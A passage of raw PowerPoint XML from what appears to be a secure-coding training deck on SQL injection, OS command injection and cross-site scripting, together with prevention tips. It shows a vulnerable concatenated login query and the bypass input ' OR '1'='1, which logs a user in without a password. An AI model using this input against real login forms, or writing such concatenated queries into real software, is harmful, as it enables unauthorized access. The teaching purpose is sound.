          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Original SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Query:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718038" y="1676400"/>
            <a:ext cx="7924800" cy="707886"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>String sqlQuery = "SELECT * FROM user WHERE name = '" + username +"' AND pass='" + password + "'“</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{58452FF4-89E3-4D1B-9927-2DBDC00E58D7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="C:\Documents and Settings\mostafa.siraj\My Documents\Common Vulnerabilities Images\login_form.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161940" y="4724399"/>
            <a:ext cx="2480897" cy="976675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337038" y="2590800"/>
            <a:ext cx="8686800" cy="1015663"/>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1" kern="1200" baseline="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ts val="3800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFAD9F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr sz="28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a:t>Setting username to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>John</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>password to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>OR '1'= '1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>produces</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718038" y="3733800"/>
            <a:ext cx="7924800" cy="70788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rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2000" b="1" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8CF4F2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>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noProof="1"/>
              <a:t>String sqlQuery = SELECT * FROM user WHERE name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>'John' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>AND pass='' OR '1'='1'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337038" y="4724400"/>
            <a:ext cx="8686800" cy="1605568"/>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1" kern="1200" baseline="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ts val="3800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFAD9F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr sz="28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t>The result:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If a user John exists – he is </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>logged in without password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35260690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Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is security testing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Directed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and focused form of testing that attempts to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>force specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>failures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>to occur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:tabLst>
                <a:tab pos="1654175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Focused especially on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>reliability</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 5"/>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3193143" y="3733800"/>
            <a:ext cx="2757714" cy="2496458"/>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72158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DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{58452FF4-89E3-4D1B-9927-2DBDC00E58D7}" type="slidenum">
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Exploits of a M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66" y="2838092"/>
            <a:ext cx="8905823" cy="2741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0467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DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{58452FF4-89E3-4D1B-9927-2DBDC00E58D7}" type="slidenum">
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 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0" y="991537"/>
            <a:ext cx="9144000" cy="5884606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13743789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Preventing SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8686800" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use Prepared Statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Validate all of the user information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remove special characters from the user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Never show SQL error messages to the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use different field names for user interface and database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable all unused features of the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit user permissions for the database </a:t>
            </a:r>
          </a:p>
          <a:p>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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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315200" y="1066800"/>
            <a:ext cx="1360264" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="octagon">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08631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OS Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>OS command injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack occurs when an attacker attempts to execute system level commands through a vulnerable application.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="bg-BG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://cdn.cnet.com.au/story_media/339281482/protect-wifi-network_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2826223"/>
            <a:ext cx="6324600" cy="3734663"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12122"/>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063712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OS Command Injection (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it as any authorized system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>However</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, commands are executed with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>same privileges </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and environment as the application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>has</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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7309" y="4352682"/>
            <a:ext cx="3532909" cy="2352918"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12122"/>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861060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143000"/>
            <a:ext cx="4876800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS Command Injection</a:t>
            </a:r>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47" t="36065" r="82417" b="23889"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="1371600"/>
            <a:ext cx="2855495" cy="2051637"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12122"/>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txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="4114800"/>
            <a:ext cx="4876800" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" bIns="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="5000" b="1" kern="1200" cap="none" baseline="0">
                <a:ln w="500">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FAF7C8"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DEMO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="http://john0831.files.wordpress.com/2011/06/injec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125360">
            <a:off x="533400" y="2869406"/>
            <a:ext cx="4762500" cy="3176588"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12122"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>
            </a:outerShdw>
          </a:effectLst>
          <a:extLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1060830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Golden Rule 3. Limit the Publicly Available Resources</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="8686800" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do you really need a method or a class to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If not – make it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>protected</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7171"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819400" y="3505200"/>
            <a:ext cx="3505200" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>
            </a:outerShdw>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6372" y="5257800"/>
            <a:ext cx="2272281" cy="1476375"/>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88026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XSS – Cross-site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is XSS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A type of  computer security vulnerability </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>injecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>client-side script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into web pages viewed by other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>users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57</a:t>
            </a:fld>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314700" y="3657600"/>
            <a:ext cx="2514600" cy="2746716"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12122"/>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3489311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XSS – Cross-site Scripting (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is XSS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>malicious code along with the original webpage gets displayed in the web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allows hackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to gain greater access of that page</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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074"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933825" y="3463498"/>
            <a:ext cx="4572000" cy="3048000"/>
          </a:xfrm>
